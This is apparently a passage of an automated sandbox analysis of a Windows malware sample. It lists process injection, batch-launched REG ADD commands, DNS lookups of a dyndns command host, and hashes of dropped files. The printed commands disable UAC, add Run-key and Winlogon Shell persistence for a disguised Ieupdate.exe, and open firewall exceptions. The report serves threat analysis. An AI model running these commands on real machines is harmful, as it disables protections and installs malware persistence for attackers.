PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dVBuy.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nrMkX.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqZTD.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
GB 95.101.143.195:443 www.bing.com tcp
US 8.8.8.8:53 195.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 167.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp

Files

memory/4596-0-0x0000000000400000-0x00000000005A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JNYVYK.txt

MD5 9fcec2a4ee61953e0d4867261a39ea32
SHA1 d552acf26d9fcc31a9da82ecce503b16a11e9d2a
SHA256 24c5da914d1f429c07ef17dfb7d4d0c90eb060e5a9bd009963fba83b1dd6cae3
SHA512 57d8a88138645780357a88658f21f833efa0ba657dd1fefa6458ba930731e1949216b518f26ab995241837bc7e6eff90b46e5cb5ec34364d2f89db09779e5564

C:\Users\Admin\AppData\Local\Temp\dVBuy.bat

MD5 5d73853d695283e13b412c88ec62984c
SHA1 672379399a80a746a8f0d8043bbf98956101d0ca
SHA256 59884297b763a498c1f55e4ba57f04597ab37677feb9b686839e7553942cf335
SHA512 9043d02ec14cc4869cc8c01562838c11448e2bff42af32ec0a60de76fa8915c3a3a50529ce567c6cb93d2691525b38862257993674c263ed25f6625e370cb2d2

C:\Users\Admin\AppData\Local\Temp\nrMkX.bat

MD5 3d470539cbafa762cdb72a4635ad553d
SHA1 4bda3e7de91052dc7d073d8b278ad09ad0d10fa6
SHA256 9f0571e3567d7e1849c7bd5dd7b7a2be942ec44aea6c8bb32d415874b7282691
SHA512 42b168fabd5ddd175ccd143d4f9338880aad03eb22d07fb8a2e13f387015b9eb1d23307bff3ae370c95a5644c88c5e9f7c8b12b332b595c79be069ffc92a448e

C:\Users\Admin\AppData\Local\Temp\xqZTD.bat

MD5 09d67635a7674b12183c3f0668ce0cd1
SHA1 c3fe2225cc5198a1c33df0342a95528c2e657a6d
SHA256 972e896e8649a5d2caf286a0d75db99909587b1d2f4683870207b547c3bc02d9
SHA512 b37bdad4fb0e9ab947ea5750337de073907d31156d0d00a1a79392741ced2d1aabf1cc2d92581d7f068266f82cd5b2c10fd7e5c573044e6ce77dea6da6dde321

C:\Program Files (x86)\Internet Explorer\Ieupdate.txt

MD5 a94c5de11a9047cd4d73251cfe574ba7
SHA1 0cf65ad49fd994a2133603759438324c95849e8d
SHA256 40fd483d6a35c6982c61f16a76f1b0781532836e34c957c26fcec3c60809dd34
SHA512 f317611ea39e8ed66c775063af615abca2c4a56653d7d507b234c6e7b169ecadc8803eb381cc7edbf09ca0dda8b9813214ead3cd7383d443627a13caf4a89396

memory/1292-55-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-57-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-59-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4768-63-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4768-69-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4768-70-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1292-73-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4768-77-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1292-78-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-83-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-87-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-91-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-95-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-99-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-103-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-107-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-115-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-119-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-123-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-127-0x0000000000400000-0x000000000045C000-memory.dmp